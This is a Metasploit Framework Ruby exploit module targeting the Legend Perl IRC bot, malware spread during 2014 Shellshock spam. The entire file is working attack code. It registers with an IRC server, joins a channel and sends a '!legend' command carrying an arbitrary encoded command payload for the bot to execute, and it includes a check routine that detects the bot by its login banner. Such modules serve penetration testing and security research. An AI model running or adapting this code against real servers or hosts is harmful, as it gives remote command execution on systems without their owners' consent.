rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/legend_bot_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
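class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Legend Perl IRC Bot Remote Code Execution',
        'Description' => %q{
          This module exploits a remote command execution on the Legend Perl IRC Bot.
          This bot has been used as a payload in the Shellshock spam last October 2014.
          This particular bot has functionalities like NMAP scanning, TCP, HTTP, SQL, and
          UDP flooding, the ability to remove system logs, and ability to gain root, and
          VNC scanning.

          Kevin Stevens, a Senior Threat Researcher at Damballa, has uploaded this script
          to VirusTotal with a md5 of 11a9f1589472efa719827079c3d13f76.
        },
        'Author' => [
          'Jay Turla' # msf and initial discovery
          # MalwareMustDie
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '121681' ],
          [ 'EDB', '36836' ],
          [ 'URL', 'https://www.damballa.com/perlbotnado/' ],
          [ 'URL', 'http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html' ] # Shellshock spam October 2014 details
        ],
        'Platform' => %w{unix win},
        'Arch' => ARCH_CMD,
        'Payload' => {
          'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
          'DisableNops' => true,
          'Compat' =>
          {
            'PayloadType' => 'cmd'
          }
        },
        'Targets' => [
          [ 'Legend IRC Bot', {} ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2015-04-27',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(6667),
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
      ]
    )
  end

  # This module talks to the service only after registering with it
  # (NICK/USER and the optional PASS), so it is flagged as post-auth.
  def post_auth?
    true
  end

  # Registers with the IRC server, joins CHANNEL and looks at the buffered
  # reply for the bot's "auth" / "logged in" text.
  #
  # @return [Exploit::CheckCode] Unknown when registration is refused or the
  #   JOIN is not acknowledged, Vulnerable when the bot's banner is seen,
  #   Safe otherwise
  def check
    connect

    res = register(sock)
    if registration_refused?(res)
      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      disconnect # do not leave the registration socket open on the early exit
      return Exploit::CheckCode::Unknown
    end

    res = join(sock)
    unless channel_joined?(res)
      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      disconnect
      return Exploit::CheckCode::Unknown
    end

    quit(sock)
    disconnect

    # Both fragments must be present in the JOIN reply; either alone is not
    # treated as evidence.
    if res =~ /auth/ && res =~ /logged in/
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  # Writes +data+ to the socket and then drains the reply with repeated
  # one-second reads until a read returns nil.
  #
  # @param sock [Rex::Socket] the connected IRC socket
  # @param data [String] raw IRC line(s), CRLF-terminated
  # @return [String] everything read back; empty when nothing arrived or
  #   the read was cut short by EOF/timeout (which is only logged)
  def send_msg(sock, data)
    sock.put(data)
    response = ''.dup
    begin
      chunk = sock.get_once(-1, 1)
      until chunk.nil?
        response << chunk
        chunk = sock.get_once(-1, 1)
      end
    rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
      # A short read is expected once the server stops talking; keep what
      # was collected so far rather than failing the whole exchange.
      elog(e)
    end

    response
  end

  # Sends the registration sequence: optional PASS, then NICK and USER.
  #
  # @param sock [Rex::Socket] the connected IRC socket
  # @return [String] the server's reply, as collected by +send_msg+
  def register(sock)
    msg = ''.dup

    password = datastore['IRC_PASSWORD']
    msg << "PASS #{password}\r\n" if password && !password.empty?

    # Nicknames longer than 9 characters are replaced by a random 9-letter
    # one; the operator is told which nick was actually used.
    nick = datastore['NICK']
    if nick.length > 9
      nick = rand_text_alpha(9)
      print_error("The nick is longer than 9 characters, using #{nick}")
    end

    msg << "NICK #{nick}\r\n"
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

    send_msg(sock, msg)
  end

  # Sends JOIN for the configured CHANNEL.
  #
  # @param sock [Rex::Socket] the connected IRC socket
  # @return [String] the server's reply, as collected by +send_msg+
  def join(sock)
    send_msg(sock, "JOIN #{datastore['CHANNEL']}\r\n")
  end

  # Delivers the encoded payload to the channel as a "!legend" command.
  #
  # @param sock [Rex::Socket] the connected IRC socket
  # @return [String] the server's reply, as collected by +send_msg+
  def legend_command(sock)
    encoded = payload.encoded
    send_msg(sock, "PRIVMSG #{datastore['CHANNEL']} :!legend #{encoded}\r\n")
  end

  # Sends QUIT without waiting for a reply.
  #
  # @param sock [Rex::Socket] the connected IRC socket
  def quit(sock)
    sock.put("QUIT :bye bye\r\n")
  end

  # Registers, joins the channel, sends the command and disconnects.
  # Returns early (with the socket closed) if registration is refused or
  # the JOIN is not acknowledged.
  def exploit
    connect

    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
    res = register(sock)
    if registration_refused?(res)
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      disconnect
      return
    end

    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
    res = join(sock)
    unless channel_joined?(res)
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      disconnect
      return
    end

    print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")
    legend_command(sock)

    quit(sock)
    disconnect
  end

  private

  # True when the registration reply carries ERR_NOPERMFORHOST (463) or
  # ERR_PASSWDMISMATCH (464). The numeric is matched anywhere in the
  # buffered reply, as the original check did.
  #
  # @param res [String] reply collected after the registration sequence
  # @return [Boolean]
  def registration_refused?(res)
    !!(res =~ /463/ || res =~ /464/)
  end

  # True when the JOIN reply carries RPL_NAMREPLY (353) or RPL_ENDOFNAMES
  # (366). The previous form `!res =~ /353/ && !res =~ /366/` negated the
  # string before matching (`!res` is false for any String), so the
  # "error joining" branch could never be taken; this predicate restores
  # the intended test.
  #
  # @param res [String] reply collected after JOIN
  # @return [Boolean]
  def channel_joined?(res)
    !!(res =~ /353/ || res =~ /366/)
  end
end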